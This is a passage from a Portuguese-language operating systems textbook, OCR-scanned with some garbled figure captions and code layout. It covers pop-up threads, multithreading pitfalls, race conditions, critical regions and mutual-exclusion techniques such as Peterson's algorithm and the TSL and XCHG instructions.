do processo interrompido, como a conclusão da E/S de 
outro processo, quando o tratador da interrupção termi- 
nar, ele coloca o thread de interrupção de volta no esta- 
do de antes da interrupção. Se, no entanto, o processo 
está interessado na interrupção, como a chegada de uma 
página necessitada por um dos threads do processo, o 
thread interrompido não é reinicializado. Em vez disso, 
ele é suspenso, e o sistema de tempo de execução é ini- 
cializado naquela CPU virtual, com o estado do thread 
interrompido na pilha. Então cabe ao sistema de tem- 
po de execução decidir qual thread escalonar naquela 
CPU: o thread interrompido, o recentemente pronto ou 
uma terceira escolha. 

Uma objeção às ativações pelo escalonador é a con- 
fiança fundamental nos upcalls, um conceito que viola a 
estrutura inerente em qualquer sistema de camadas. Em 
geral, a camada n oferece determinados serviços que a 
camada n + 1 pode chamar, mas a camada n pode não 
chamar rotinas na camada n + 1. Upcalls não seguem 
esse princípio fundamental. 


2.2.8 Threads pop-up 


Threads costumam ser úteis em sistemas distribui- 
dos. Um exemplo importante é como mensagens que 
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chegam — por exemplo, requisições de serviços — são 
tratadas. A abordagem tradicional é ter um processo 
ou thread que esteja bloqueado em uma chamada de 
sistema receive esperando pela mensagem que chega. 
Quando uma mensagem chega, ela é aceita, aberta, seu 
conteúdo examinado e processada. 

No entanto, uma abordagem completamente diferen- 
te também é possível, na qual a chegada de uma mensa- 
gem faz o sistema criar um novo thread para lidar com 
a mensagem. Esse thread é chamado de thread pop-up 
e está ilustrado na Figura 2.18. Uma vantagem funda- 
mental de threads pop-up é que como são novos, eles 
não têm história alguma — registradores, pilha, o que 
quer que seja — que devem ser restaurados. Cada um 
começa fresco e cada um é idêntico a todos os outros. 
Isso possibilita a criação de tais threads rapidamente. O 
thread novo recebe a mensagem que chega para proces- 
sar. O resultado da utilização de threads pop-up é que a 
latência entre a chegada da mensagem e o começo do 
processamento pode ser encurtada. 

Algum planejamento prévio é necessário quando 
threads pop-up são usados. Por exemplo, em qual pro- 
cesso o thread é executado? Se o sistema dá suporte a 
threads sendo executados no contexto núcleo, o thread 
pode ser executado ali (razão pela qual não mostramos 
o núcleo na Figura 2.18). Executar um thread pop-up no 
espaço núcleo normalmente é mais fácil e mais rápido 
do que colocá-lo no espaço do usuário. Também, um 
thread pop-up no espaço núcleo consegue facilmente 
acessar todas as tabelas do núcleo e os dispositivos de 
E/S, que podem ser necessários para o processamento 
de interrupções. Por outro lado, um thread de núcleo 
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com erros pode causar mais danos que um de usuário 
com erros. Por exemplo, se ele for executado por tempo 
demais e não liberar a CPU, dados que chegam podem 
ser perdidos para sempre. 


2.2.9 Convertendo código de um thread em 
código multithread 


Muitos programas existentes foram escritos para 
processos monothread. Convertê-los para multithrea- 
ding é muito mais complicado do que pode parecer em 
um primeiro momento. A seguir examinaremos apenas 
algumas das armadilhas. 

Para começo de conversa, o código de um thread em 
geral consiste em múltiplas rotinas, exatamente como 
um processo. Essas rotinas podem ter variáveis locais, 
variáveis globais e parâmetros. Variáveis locais e de pa- 
râmetros não causam problema algum, mas variáveis 
que são globais para um thread, mas não globais para o 
programa inteiro, são um problema. Essas são variáveis 
que são globais no sentido de que muitos procedimentos 
dentro do thread as usam (como poderiam usar qualquer 
variável global), mas outros threads devem logicamente 
deixá-las sozinhas. 

Como exemplo, considere a variável errno mantida 
pelo UNIX. Quando um processo (ou thread) faz uma 
chamada de sistema que falha, o código de erro é co- 
locado em errno. Na Figura 2.19, o thread 1 executa a 
chamada de sistema access para descobrir se ela tem 
permissão para acessar determinado arquivo. O sistema 
operacional retorna a resposta na variável global errno. 
Após o controle ter retornado para o thread 1, mas antes 
de ele ter uma chance de ler errno, o escalonador de- 
cide que o thread 1 teve tempo de CPU suficiente para 
o momento e decide trocar para o thread 2. O thread 2 


[e WE) Conflitos entre threads sobre o uso de uma variável 
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executa uma chamada open que falha, o que faz que 
errno seja sobrescrito e o código de acesso do thread 
1 seja perdido para sempre. Quando o thread 1 inicia 
posteriormente, ele terá o valor errado e comportar-se-á 
incorretamente. 

Várias soluções para esse problema são possíveis. 
Uma é proibir completamente as variáveis globais. Por 
mais válido que esse ideal possa ser, ele entra em con- 
flito com grande parte dos softwares existentes. Outra é 
designar a cada thread as suas próprias variáveis globais 
privadas, como mostrado na Figura 2.20. Dessa manei- 
ra, cada thread tem a sua própria cópia privada de errno 
e outras variáveis globais, de modo que os conflitos são 
evitados. Na realidade, essa decisão cria um novo nível 
de escopo, variáveis visíveis a todas as rotinas de um 
thread (mas não para outros threads), além dos níveis de 
escopo existentes de variáveis visíveis apenas para uma 
rotina e variáveis visíveis em toda parte no programa. 

No entanto, acessar as variáveis globais privadas é 
um pouco complicado já que a maioria das linguagens 
de programação tem uma maneira de expressar variá- 
veis locais e variáveis globais, mas não formas interme- 
diárias. É possível alocar um pedaço da memória para 
as globais e passá-lo para cada rotina no thread como 
um parâmetro extra. Embora dificilmente você possa 
considerá-la uma solução elegante, ela funciona. 

Alternativamente, novas rotinas de biblioteca podem 
ser introduzidas para criar, alterar e ler essas variáveis 
globais restritas ao thread. A primeira chamada pode pa- 
recer assim: 


create global(“bufptr”); 


Ke TPE] Threads podem ter variáveis globais individuais. 
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Ela aloca memória para um ponteiro chamado bufptr no 
heap ou em uma área de armazenamento especial reser- 
vada para o thread que emitiu a chamada. Não impor- 
ta onde a memória esteja alocada, apenas o thread que 
emitiu a chamada tem acesso à variável global. Se outro 
thread criar uma variável global com o mesmo nome, 
ele obterá uma porção de memória que não entrará em 
conflito com a existente. 

Duas chamadas são necessárias para acessar variá- 
veis globais: uma para escrevê-las e a outra para lê-las. 
Para escrever, algo como 


set global(“bufptr”, &buf) 


bastará. Ela armazena o valor de um ponteiro na por- 
ção de memória previamente criada pela chamada para 
create global. Para ler uma variável global, a chamada 
pode ser algo como 


bufptr = read global(“bufptr”). 


Ela retorna o endereço armazenado na variável glo- 
bal, de maneira que os seus dados possam ser acessados. 

O próximo problema em transformar um programa 
de um único thread em um programa com múltiplos 
threads é que muitas rotinas de biblioteca não são re- 
entrantes. Isto é, elas não foram projetadas para ter uma 
segunda chamada feita para uma rotina enquanto uma 
anterior ainda não tiver sido concluída. Por exemplo, 
o envio de uma mensagem através de uma rede pode 
ser programado com a montagem da mensagem em um 
buffer fixo dentro da biblioteca, seguido de um cha- 
veamento para enviá-la. O que acontece se um thread 
montou a sua mensagem no buffer, então, uma interrup- 
ção de relógio força um chaveamento para um segundo 
thread que imediatamente sobrescreve o buffer com sua 
própria mensagem? 

Similarmente, rotinas de alocação de memória como 
malloc no UNIX, mantêm tabelas cruciais sobre o uso de 
memória, por exemplo, uma lista encadeada de pedaços 
de memória disponíveis. Enquanto malloc está ocupada 
atualizando essas listas, elas podem temporariamente 
estar em um estado inconsistente, com ponteiros que 
apontam para lugar nenhum. Se um chaveamento de 
threads ocorrer enquanto as tabelas forem inconsisten- 
tes e uma nova chamada entrar de um thread diferente, 
um ponteiro inválido poderá ser usado, levando à queda 
do programa. Consertar todos esses problemas efetiva- 
mente significa reescrever toda a biblioteca. Fazê-lo é 
uma atividade não trivial com uma possibilidade real de 
ocorrer a introdução de erros sutis. 

Uma solução diferente é fornecer a cada rotina uma 
proteção que altera um bit para indicar que a biblioteca 
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está sendo usada. Qualquer tentativa de outro thread 
usar uma rotina de biblioteca enquanto a chamada ante- 
rior ainda não tiver sido concluída é bloqueada. Embora 
essa abordagem possa ser colocada em funcionamento, 
ela elimina muito o paralelismo em potencial. 

Em seguida, considere os sinais. Alguns são logica- 
mente específicos a threads, enquanto outros não. Por 
exemplo, se um thread chama alarm, faz sentido para 
o sinal resultante ir até o thread que fez a chamada. No 
entanto, quando threads são implementados inteiramen- 
te no espaço de usuário, o núcleo não tem nem ideia a 
respeito dos threads e mal pode dirigir o sinal para o 
thread certo. Uma complicação adicional ocorre se um 
processo puder ter apenas um alarme pendente por vez e 
vários threads chamam alarm independentemente. 

Outros sinais, como uma interrupção de teclado, não 
são específicos aos threads. Quem deveria pegá-los? 
Um thread designado? Todos os threads? Um thread 
pop-up recentemente criado? Além disso, o que aconte- 
ce se um thread mudar os tratadores de sinal sem contar 
para os outros threads? E o que acontece se um thread 
quiser pegar um sinal em particular (digamos, o usuá- 
rio digitando CTRL-C), e outro thread quiser esse sinal 
para concluir o processo? Essa situação pode surgir se 
um ou mais threads executarem rotinas de biblioteca- 
-padrão e outros forem escritos por usuários. Claramen- 
te, esses desejos são incompatíveis. Em geral, sinais são 
suficientemente dificeis para gerenciar em um ambiente 
de um thread único. Ir para um ambiente de múltiplos 
threads não torna a situação mais fácil de lidar. 

Um último problema introduzido pelos threads é o 
gerenciamento de pilha. Em muitos sistemas, quando a 
pilha de um processo transborda, o núcleo apenas forne- 
ce àquele processo mais pilha automaticamente. Quando 
um processo tem múltiplos threads, ele também tem múl- 
tiplas pilhas. Se o núcleo não tem ciência de todas essas 
pilhas, ele não pode fazê-las crescer automaticamente por 
causa de uma falha de pilha. Na realidade, ele pode nem 
se dar conta de que uma falha de memória está relaciona- 
da com o crescimento da pilha de algum thread. 

Esses problemas certamente não são insuperáveis, 
mas mostram que apenas introduzir threads em um sis- 
tema existente sem uma alteração bastante substancial 
do sistema não vai funcionar mesmo. No minimo, as 
semânticas das chamadas de sistema talvez precisem 
ser redefinidas e as bibliotecas reescritas. E todas es- 
sas coisas devem ser feitas de maneira a permanecerem 
compatíveis com programas já existentes para o caso 
limitante de um processo com apenas um thread. Para 
informações adicionais sobre threads, ver Hauser et al. 
(1993), Marsh et al. (1991) e Rodrigues et al. (2010). 
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2.3 Comunicação entre processos 


Processos quase sempre precisam comunicar-se com 
outros processos. Por exemplo, em um pipeline do in- 
terpretador de comandos, a saída do primeiro processo 
tem de ser passada para o segundo, e assim por diante 
até o fim da linha. Então, há uma necessidade por co- 
municação entre os processos, de preferência de uma 
maneira bem estruturada sem usar interrupções. Nas 
seções a seguir, examinaremos algumas das questões 
relacionadas com essa comunicação entre processos 
(interprocess communication — IPC). 

De maneira bastante resumida, há três questões aqui. 
A primeira acaba de ser mencionada: como um processo 
pode passar informações para outro. A segunda tem a 
ver com certificar-se de que dois ou mais processos não 
se atrapalhem, por exemplo, dois processos em um sis- 
tema de reserva de uma companhia aérea cada um ten- 
tando ficar com o último assento em um avião para um 
cliente diferente. A terceira diz respeito ao sequencia- 
mento adequado quando dependências estão presentes: 
se o processo 4 produz dados e o processo B os impri- 
me, B tem de esperar até que 4 tenha produzido alguns 
dados antes de começar a imprimir. Examinaremos to- 
das as três questões começando na próxima seção. 

Também é importante mencionar que duas dessas 
questões aplicam-se igualmente bem aos threads. A pri- 
meira — passar informações — é fácil para os threads, já 
que eles compartilham de um espaço de endereçamento 
comum (threads em espaços de endereçamento diferen- 
tes que precisam comunicar-se são questões relativas à 
comunicação entre processos). No entanto, as outras duas 
— manter um afastado do outro e o sequenciamento cor- 
reto — aplicam-se igualmente bem aos threads. A seguir 
discutiremos o problema no contexto de processos, mas, 
por favor, mantenha em mente que os mesmos problemas 
e soluções também se aplicam aos threads. 


2.3.1 Condições de corrida 


Em alguns sistemas operacionais, processos que es- 
tão trabalhando juntos podem compartilhar de alguma 
memória comum que cada um pode ler e escrever. A 
memória compartilhada pode encontrar-se na memória 
principal (possivelmente em uma estrutura de dados de 
núcleo) ou ser um arquivo compartilhado; o local da 
memória compartilhada não muda a natureza da comu- 
nicação ou os problemas que surgem. Para ver como 
a comunicação entre processos funciona na prática, 
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vamos considerar um exemplo simples, mas comum: 
um spool de impressão. Quando um processo quer im- 
primir um arquivo, ele entra com o nome do arquivo em 
um diretório de spool especial. Outro processo, o dae- 
mon de impressão, confere periodicamente para ver se 
há quaisquer arquivos a serem impressos, e se houver, 
ele os imprime e então remove seus nomes do diretório. 

Imagine que nosso diretório de spool tem um núme- 
ro muito grande de vagas, numeradas 0, 1, 2, ..., cada 
uma capaz de conter um nome de arquivo. Também 
imagine que há duas variáveis compartilhadas, out, 
que apontam para o próximo arquivo a ser impresso, e 
in, que aponta para a próxima vaga livre no diretório. 
Essas duas variáveis podem muito bem ser mantidas 
em um arquivo de duas palavras disponível para todos 
os processos. Em determinado instante, as vagas 0 a 
3 estarão vazias (os arquivos já foram impressos) e as 
vagas 4 a 6 estarão cheias (com os nomes dos arquivos 
na fila para impressão). De maneira mais ou menos 
simultânea, os processos 4 e B decidem que querem 
colocar um arquivo na fila para impressão. Essa situa- 
ção é mostrada na Figura 2.21. 

Nas jurisdições onde a Lei de Murphy? for aplicável, 
pode ocorrer o seguinte: o processo 4 lê in e armazena o 
valor, 7, em uma variável local chamada next free slot. 
Logo em seguida uma interrupção de relógio ocorre e a 
CPU decide que o processo 4 executou por tempo sufi- 
ciente, então, ele troca para o processo B. O processo B 
também lê in e recebe um 7. Ele, também, o armazena em 
sua variável local next free slot. Nesse instante, ambos os 
processos acreditam que a próxima vaga disponível é 7. 

O processo B agora continua a executar. Ele armaze- 
na o nome do seu arquivo na vaga 7 e atualiza in para ser 
um 8. Então ele segue em frente para fazer outras coisas. 


eiT PEA Dois processos querem acessar a memória 
compartilhada ao mesmo tempo. 


Diretório 
de spool 


out = 4 
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Por fim, o processo 4 executa novamente, começan- 
do do ponto onde ele parou. Ele olha para next free . 
slot, encontra um 7 ali e escreve seu nome de arquivo 
na vaga 7, apagando o nome que o processo B recém- 
-colocou ali. Então calcula next free slot + 1, que é 8, 
e configura in para 8. O diretório de spool está agora 
internamente consistente, então o daemon de impressão 
não observará nada errado, mas o processo B jamais re- 
ceberá qualquer saída. O usuário B ficará em torno da 
impressora por anos, aguardando esperançoso por uma 
saída que nunca virá. Situações como essa, em que dois 
ou mais processos estão lendo ou escrevendo alguns da- 
dos compartilhados e o resultado final depende de quem 
executa precisamente e quando, são chamadas de con- 
dições de corrida. A depuração de programas contendo 
condições de corrida não é nem um pouco divertida. Os 
resultados da maioria dos testes não encontram nada, 
mas de vez em quando algo esquisito e inexplicável 
acontece. Infelizmente, com o incremento do parale- 
lismo pelo maior número de núcleos, as condições de 
corrida estão se tornando mais comuns. 


2.3.2 Regiões críticas 


Como evitar as condições de corrida? A chave para 
evitar problemas aqui e em muitas outras situações envol- 
vendo memória compartilhada, arquivos compartilhados 
e tudo o mais compartilhado é encontrar alguma maneira 
de proibir mais de um processo de ler e escrever os da- 
dos compartilhados ao mesmo tempo. Colocando a ques- 
tão em outras palavras, o que precisamos é de exclusão 
mútua, isto é, alguma maneira de se certificar de que se 
um processo está usando um arquivo ou variável compar- 
tilhados, os outros serão impedidos de realizar a mesma 


a (el 0) TEEF Exclusão mútua usando regiões críticas. 
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coisa. A dificuldade mencionada ocorreu porque o proces- 
so B começou usando uma das variáveis compartilhadas 
antes de o processo A ter terminado com ela. A escolha das 
operações primitivas apropriadas para alcançar a exclusão 
mútua é uma questão de projeto fundamental em qualquer 
sistema operacional, e um assunto que examinaremos de- 
talhadamente nas seções a seguir. 

O problema de evitar condições de corrida também 
pode ser formulado de uma maneira abstrata. Durante 
parte do tempo, um processo está ocupado realizando 
computações internas e outras coisas que não levam a 
condições de corrida. No entanto, às vezes um processo 
tem de acessar uma memória compartilhada ou arquivos, 
ou realizar outras tarefas críticas que podem levar a cor- 
ridas. Essa parte do programa onde a memória compar- 
tilhada é acessada é chamada de região crítica ou seção 
crítica. Se conseguissemos arranjar as coisas de maneira 
que jamais dois processos estivessem em suas regiões 
críticas ao mesmo tempo, poderíamos evitar as corridas. 

Embora essa exigência evite as condições de corrida, 
ela não é suficiente para garantir que processos em pa- 
ralelo cooperem de modo correto e eficiente usando da- 
dos compartilhados. Precisamos que quatro condições 
se mantenham para chegar a uma boa solução: 


1. Dois processos jamais podem estar simultanea- 
mente dentro de suas regiões críticas. 

2. Nenhuma suposição pode ser feita a respeito de 
velocidades ou do número de CPUs. 

3. Nenhum processo executando fora de sua região 
crítica pode bloquear qualquer processo. 

4. Nenhum processo deve ser obrigado a esperar 
eternamente para entrar em sua região crítica. 


Em um sentido abstrato, o comportamento que que- 
remos é mostrado na Figura 2.22. Aqui o processo 4 
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entra na sua região crítica no tempo 7,. Um pouco mais 
tarde, no tempo T » O processo B tenta entrar em sua 
região crítica, mas não consegue porque outro processo 
já está em sua região crítica e só permitimos um de cada 
vez. Em consequência, B é temporariamente suspenso 
até o tempo T,, quando 4 deixa sua região crítica, per- 
mitindo que B entre de imediato. Por fim, B sai (em T,) 
e estamos de volta à situação original sem nenhum pro- 
cesso em suas regiões críticas. 


2.3.3 Exclusão mútua com espera ocupada 


Nesta seção examinaremos várias propostas para 
realizar a exclusão mútua, de maneira que enquanto um 
processo está ocupado atualizando a memória comparti- 
lhada em sua região crítica, nenhum outro entrará na sua 
região crítica para causar problemas. 


Desabilitando interrupções 


Em um sistema de processador único, a solução mais 
simples é fazer que cada processo desabilite todas as 
interrupções logo após entrar em sua região crítica e as 
reabilitar um momento antes de partir. Com as inter- 
rupções desabilitadas, nenhuma interrupção de relógio 
poderá ocorrer. Afinal de contas, a CPU só é chavea- 
da de processo em processo em consequência de uma 
interrupção de relógio ou outra, e com as interrupções 
desligadas, a CPU não será chaveada para outro proces- 
so. Então, assim que um processo tiver desabilitado as 
interrupções, ele poderá examinar e atualizar a memória 
compartilhada sem medo de que qualquer outro proces- 
so interfira. 

Em geral, essa abordagem é pouco atraente, pois 
não é prudente dar aos processos de usuário o poder de 
desligar interrupções. E se um deles desligasse uma in- 
terrupção e nunca mais a ligasse de volta? Isso poderia 
ser o fim do sistema. Além disso, se o sistema é um 
multiprocessador (com duas ou mais CPUs), desabili- 
tar interrupções afeta somente a CPU que executou a 
instrução disable. As outras continuarão executando e 
podem acessar a memória compartilhada. 

Por outro lado, não raro, é conveniente para o 
próprio núcleo desabilitar interrupções por algumas 
instruções enquanto está atualizando variáveis ou espe- 
cialmente listas. Se uma interrupção acontece enquanto 
a lista de processos prontos está, por exemplo, no esta- 
do inconsistente, condições de corrida podem ocorrer. 
A conclusão é: desabilitar interrupções é muitas vezes 
uma técnica útil dentro do próprio sistema operacional, 


mas não é apropriada como um mecanismo de exclusão 
mútua geral para processos de usuário. 

A possibilidade de alcançar a exclusão mútua desa- 
bilitando interrupções — mesmo dentro do núcleo — 
está se tornando menor a cada dia por causa do número 
cada vez maior de chips multinúcleo mesmo em PCs 
populares. Dois núcleos já são comuns, quatro estão 
presentes em muitas máquinas, e oito, 16, ou 32 não 
ficam muito atrás. Em um sistema multinúcleo (isto é, 
sistema de multiprocessador) desabilitar as interrupções 
de uma CPU não evita que outras CPUs interfiram com 
as operações que a primeira está realizando. Em con- 
sequência, esquemas mais sofisticados são necessários. 


Variáveis do tipo trava 


Como uma segunda tentativa, vamos procurar por 
uma solução de software. Considere ter uma única va- 
riável (de trava) compartilhada, inicialmente 0. Quando 
um processo quer entrar em sua região crítica, ele pri- 
meiro testa a trava. Se a trava é 0, o processo a confi- 
gura para 1 e entra na região crítica. Se a trava já é 1, 
o processo apenas espera até que ela se torne 0. Desse 
modo, um 0 significa que nenhum processo está na re- 
gião crítica, e um 1 significa que algum processo está 
em sua região crítica. 

Infelizmente, essa ideia contém exatamente a mes- 
ma falha fatal que vimos no diretório de spool. Suponha 
que um processo lê a trava e vê que ela é 0. Antes que 
ele possa configurar a trava para 1, outro processo está 
escalonado, executa e configura a trava para 1. Quando 
o primeiro processo executa de novo, ele também con- 
figurará a trava para 1, e dois processos estarão nas suas 
regiões críticas ao mesmo tempo. 

Agora talvez você pense que poderíamos dar um jeito 
nesse problema primeiro lendo o valor da trava, então, 
conferindo-a outra vez um instante antes de armazená-la, 
mas isso na realidade não ajuda. A corrida agora ocorre se 
o segundo processo modificar a trava logo após o primei- 
ro ter terminado a sua segunda verificação. 


Alternância explícita 


Uma terceira abordagem para o problema da exclu- 
são mútua é mostrada na Figura 2.23. Esse fragmento 
de programa, como quase todos os outros neste livro, 
é escrito em C. C foi escolhido aqui porque sistemas 
operacionais reais são virtualmente sempre escritos 
em C (ou às vezes C++), mas dificilmente em lingua- 
gens como Java, Python, ou Haskell. C é poderoso, 


eficiente e previsível, características críticas para se 
escrever sistemas operacionais. Java, por exemplo, 
não é previsível, porque pode ficar sem memória em 
um momento crítico e precisar invocar o coletor de 
lixo para recuperar memória em um momento real- 
mente inoportuno. Isso não pode acontecer em C, pois 
não há coleta de lixo em C. Uma comparação quantita- 
tiva de C, C++, Java e quatro outras linguagens é dada 
por Prechelt (2000). 

Na Figura 2.23, a variável do tipo inteiro turn, ini- 
cialmente 0, serve para controlar de quem é a vez de en- 
trar na região crítica e examinar ou atualizar a memória 
compartilhada. Inicialmente, o processo 0 inspeciona 
turn, descobre que ele é O e entra na sua região crítica. 
O processo 1 também encontra lá o valor O e, portan- 
to, espera em um laço fechado testando continuamente 
turn para ver quando ele vira 1. Testar continuamente 
uma variável até que algum valor apareça é chamado 
de espera ocupada. Em geral ela deve ser evitada, já 
que desperdiça tempo da CPU. Apenas quando há uma 
expectativa razoável de que a espera será curta, a espera 
ocupada é usada. Uma trava que usa a espera ocupada é 
chamada de trava giratória (spin lock). 

Quando o processo 0 deixa a região crítica, ele confi- 
gura turn para 1, a fim de permitir que o processo 1 entre 
em sua região crítica. Suponha que o processo 1 termine 
sua região rapidamente, de modo que ambos os proces- 
sos estejam em suas regiões não críticas, com turn confi- 
gurado para 0. Agora o processo 0 executa todo seu laço 


Uma solução proposta para o problema da região 
crítica. (a) Processo O. (b) Processo 1. Em ambos 
os casos, certifique-se de observar os pontos e 
vírgulas concluindo os comandos while. 


while (TRUE) £ 


while (turn !=0) /* laco */; 
critical_region( ); 
turn = 1; 
noncritical_region( ); 
} 
(a) 
while (TRUE) { 
while (turn !=1) F laco */; 


critical_region( ); 
turn = 0; 
noncritical_region( ); 


(b) 
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rapidamente, deixando sua regiao critica e configurando 
turn para 1. Nesse ponto, turn é 1 e ambos os processos 
estão sendo executados em suas regiões não críticas. 

De repente, o processo 0 termina sua região não cri- 
tica e volta para o topo do seu laço. Infelizmente, não 
lhe é permitido entrar em sua região crítica agora, pois 
turn é 1 e o processo 1 está ocupado com sua região não 
crítica. Ele espera em seu laço while até que o processo 
1 configura tum para 0. Ou seja, chavear a vez não é 
uma boa ideia quando um dos processos é muito mais 
lento que o outro. 

Essa situação viola a condição 3 estabelecida ante- 
riormente: o processo 0 está sendo bloqueado por um 
que não está em sua região crítica. Voltando ao diretório 
de spool discutido, se associarmos agora a região crítica 
com a leitura e escrita no diretório de spool, o processo 
0 não seria autorizado a imprimir outro arquivo, porque 
o processo 1 estaria fazendo outra coisa. 

Na realidade, essa solução exige que os dois proces- 
sos alternem-se estritamente na entrada em suas regiões 
críticas para, por exemplo, enviar seus arquivos para o 
spool. Apesar de evitar todas as corridas, esse algoritmo 
não é realmente um sério candidato a uma solução, pois 
viola a condição 3. 


Solução de Peterson 


Ao combinar a ideia de alternar a vez com a ideia 
das variáveis de trava e de advertência, um matemático 
holandês, T. Dekker, foi o primeiro a desenvolver uma 
solução de software para o problema da exclusão mú- 
tua que não exige uma alternância explícita. Para uma 
discussão do algoritmo de Dekker, ver Dijkstra (1965). 

Em 1981, G. L. Peterson descobriu uma maneira 
muito mais simples de realizar a exclusão mútua, tor- 
nando assim a solução de Dekker obsoleta. O algoritmo 
de Peterson é mostrado na Figura 2.24. Esse algoritmo 
consiste em duas rotinas escritas em ANSI C, o que sig- 
nifica que os protótipos de função devem ser fornecidos 
para todas as funções definidas e usadas. No entanto, a 
fim de poupar espaço, não mostraremos os protótipos 
aqui ou posteriormente. 

Antes de usar as variáveis compartilhadas (isto é, 
antes de entrar na região crítica), cada processo chama 
enter region com seu próprio número de processo, 0 
ou 1, como parâmetro. Essa chamada fará que ele espe- 
re, se necessário, até que seja seguro entrar. Após haver 
terminado com as variáveis compartilhadas, o proces- 
so chama leave region para indicar que ele terminou 
e para permitir que outros processos entrem, se assim 
desejarem. 
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Jeli: TPZ] A solução de Peterson para realizar a exclusão mútua. 


#define FALSE O 
#define TRUE 1 
#define N 2 


int turn; 
int interested[N]; 


void enter_region(int process); 


/* numero de processos */ 


/* de quem e avez? */ 
/* todos os valores O (FALSE) */ 


/* processo e O ou 1 */ 
/* numero do outro processo */ 
/* o oposto do processo */ 


/* mostra que voce esta interessado */ 
/* altera o valor de turn */ 


while (turn == process && interested[other] == TRUE) /* comando nulo */ ; 


{ 
int other; 
other = 1 — process; 
interested[process] = TRUE; 
turn = process; 
} 
void leave_region(int process) 
{ 
interested[process] = FALSE; 
i 


Vamos ver como essa solução funciona. Inicialmen- 
te, nenhum processo está na sua região crítica. Agora 
o processo 0 chama enter region. Ele indica o seu in- 
teresse alterando o valor de seu elemento de arranjo 
e alterando turn para 0. Como o processo | não está 
interessado, enter region retorna imediatamente. Se o 
processo 1 fizer agora uma chamada para enter region, 
ele esperará ali até que interested[0] mude para FALSE, 
um evento que acontece apenas quando o processo 0 
chamar leave region para deixar a região crítica. 

Agora considere o caso em que ambos os processos 
chamam enter region quase simultaneamente. Ambos ar- 
mazenarão seu número de processo em turn. O último a 
armazenar é o que conta; o primeiro é sobrescrito e perdi- 
do. Suponha que o processo 1 armazene por último, então 
turn é 1. Quando ambos os processos chegam ao coman- 
do while, o processo 0 o executa zero vez e entra em sua 
região crítica. O processo 1 permance no laço e não entra 
em sua região crítica até que o processo 0 deixe a sua. 


A instrução TSL 


Agora vamos examinar uma proposta que exige um 
pouco de ajuda do hardware. Alguns computadores, es- 
pecialmente aqueles projetados com múltiplos proces- 
sadores em mente, têm uma instrução como 


TSL RX,LOCK 


/* processo: quem esta saindo */ 


/* indica a saida da regiao critica */ 


(Test and Set Lock — teste e configure trava) que fun- 
ciona da seguinte forma: ele lê o conteúdo da palavra 
lock da memória para o registrador RX e então arma- 
zena um valor diferente de zero no endereço de memó- 
ria lock. As operações de leitura e armazenamento da 
palavra são seguramente indivisíveis — nenhum outro 
processador pode acessar a palavra na memória até que 
a instrução tenha terminado. A CPU executando a ins- 
trução TSL impede o acesso ao barramento de memória 
para proibir que outras CPUs acessem a memória até 
ela terminar. 

É importante observar que impedir o barramento 
de memória é algo muito diferente de desabilitar in- 
terrupções. Desabilitar interrupções e então realizar a 
leitura de uma palavra na memória seguida pela escrita 
não evita que um segundo processador no barramento 
acesse a palavra entre a leitura e a escrita. Na realida- 
de, desabilitar interrupções no processador 1 não exerce 
efeito algum sobre o processador 2. A única maneira de 
manter o processador 2 fora da memória até o processa- 
dor 1 ter terminado é travar o barramento, o que exige 
um equipamento de hardware especial (basicamente, 
uma linha de barramento que assegura que o barramen- 
to está travado e indisponível para outros processadores 
fora aquele que o travar). 

Para usar a instrução TSL, usaremos uma variável 
compartilhada, Jock, para coordenar o acesso à memó- 
ria compartilhada. Quando lock está em 0, qualquer 


processo pode configurá-lo para 1 usando a instrução 
TSL e, então, ler ou escrever a memória compartilhada. 
Quando terminado, o processo configura lock de volta 
para 0 usando uma instrução move comum. 

Como essa instrução pode ser usada para evitar que 
dois processos entrem simultaneamente em suas regiões 
críticas? A solução é dada na Figura 2.25. Nela, uma 
sub-rotina de quatro instruções é mostrada em uma lin- 
guagem de montagem fictícia (mas típica). A primeira 
instrução copia o valor antigo de lock para o registrador 
e, então, configura lock para 1. Assim, o valor antigo é 
comparado a 0. Se ele não for zero, a trava já foi confi- 
gurada, de maneira que o programa simplesmente volta 
para o início e o testa novamente. Cedo ou tarde ele 
se tornará 0 (quando o processo atualmente em sua re- 
gião crítica tiver terminado com sua própria região crí- 
tica), e a sub-rotina retornar, com a trava configurada. 
Destravá-la é algo bastante simples: o programa apenas 
armazena um 0 em Jock; não são necessárias instruções 
de sincronização especiais. 

Uma solução para o problema da região crítica agora 
é simples. Antes de entrar em sua região crítica, um pro- 
cesso chama enter region, que fica em espera ocupada 
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até a trava estar livre; então ele adquire a trava e retorna. 
Após deixar a região crítica, o processo chama leave | 
region, que armazena um 0 em lock. Assim como com 
todas as soluções baseadas em regiões críticas, os pro- 
cessos precisam chamar enter region e leave region 
nos momentos corretos para que o método funcione. Se 
um processo trapaceia, a exclusão mútua fracassará. Em 
outras palavras, regiões críticas funcionam somente se 
OS processos cooperarem. 

Uma instrução alternativa para TSL é XCHG, que 
troca os conteúdos de duas posições atomicamente; por 
exemplo, um registrador e uma palavra de memória. O 
código é mostrado na Figura 2.26, e, como podemos 
ver, é essencialmente o mesmo que a solução com TSL. 
Todas as CPUs Intel x86 usam a instrução XCHG para a 
sincronização de baixo nível. 


2.3.4 Dormir e acordar 


Tanto a solução de Peterson, quanto as soluções usan- 
do TSL ou XCHG estão corretas, mas ambas têm o defei- 
to de necessitar da espera ocupada. Na essência, o que 


ia (ei 0) TEE Entrando e saindo de uma região crítica usando a instrução TSL. 


enter region: 
TSL REGISTER,LOCK 
CMP REGISTER,#0 
JNE enter_region 


| lock valia zero? 


| copia lock para o registrador e poe lock em 1 


| se fosse diferente de zero, lock estaria ligado; portanto, 


continue no laco de repeticao 


RET 


leave region: 
MOVE LOCK,#0 
RET 


| coloque O em lock 
| retorna a quem chamou 


| retorna a quem chamou; entrou na regiao critica 


KETEJ Entrando e saindo de uma região crítica usando a instrução XCHG. 


enter region: 
MOVE REGISTER,41 
XCHG REGISTER,LOCK 
CMP REGISTER,#0 
JNE enter region 


| lock valia zero? 


| insira 1 no registrador 
| substitua os conteudos do registrador e a variacao de lock 


| se fosse diferente de zero, lock estaria ligado; portanto 


continue no laco de repeticao 


RET 


leave region: 
MOVE LOCK,#0 
RET 


| coloque O em lock 
| retorna a quem chamou 


| retorna a quem chamou; entrou na regiao critica 
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essas soluções fazem é o seguinte: quando um processo 
quer entrar em sua região crítica, ele confere para ver se 
a entrada é permitida. Se não for, o processo apenas es- 
perará em um laço apertado até que isso seja permitido. 

Não apenas essa abordagem desperdiça tempo da 
CPU, como também pode ter efeitos inesperados. Con- 
sidere um computador com dois processos, H, com alta 
prioridade, e L, com baixa prioridade. As regras de es- 
